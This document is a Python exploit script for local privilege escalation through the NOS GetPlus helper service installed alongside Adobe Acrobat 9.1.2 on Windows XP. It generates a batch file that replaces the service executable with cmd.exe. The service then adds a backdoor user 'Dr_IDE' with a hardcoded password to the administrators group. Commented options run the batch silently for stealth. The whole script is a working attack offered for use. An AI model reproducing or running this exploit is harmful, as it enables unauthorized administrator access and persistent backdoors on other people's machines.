#!/usr/bin/env python ################################################################################## # # Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit # Coded By: Dr_IDE # Discovered by: Nine:Situations:Group # Tested On: Windows XP SP2, Requires NOS Package Installed # Usage: python Dr_IDE-Adobe_912.py # ################################################################################## import os, subprocess # # Should probably have a try block around this as not every install # of 9.1.2 has the NOS package on it. This is a little touchy so you may have to # play around with it. # # This is a super lame way to do this but it makes it more educational. evil = "echo *************************************************************\n" evil += "echo *\n" evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n" evil += "echo * Coded By: Dr_IDE\n" evil += "echo * Discovered By: Nine:Situations:Group\n" evil += "echo * Tested On: Windows XP SP2\n" evil += "echo *\n" evil += "echo *************************************************************\n" evil += "echo This will add user Dr_IDE:password to the Admin Group\n" evil += "cd C:\\Program Files\\NOS\\bin\n" evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n" evil += "copy /Y %systemroot%\\system32\\cmd.exe\n" evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n" evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n" evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n" evil += "exit" f1 = open('Dr_IDE-Adobe.bat','w'); f1.write(evil); f1.close(); # Here are two ways to execute this exploit. If you leave both commented just the batch file is created. # Silent Way - This should be more stealthy #retval = subprocess.call("Dr_IDE-Adobe.bat"); # Louder Way - On some systems this will probably open a DOS window #retval = os.system("Dr_IDE-Adobe.bat");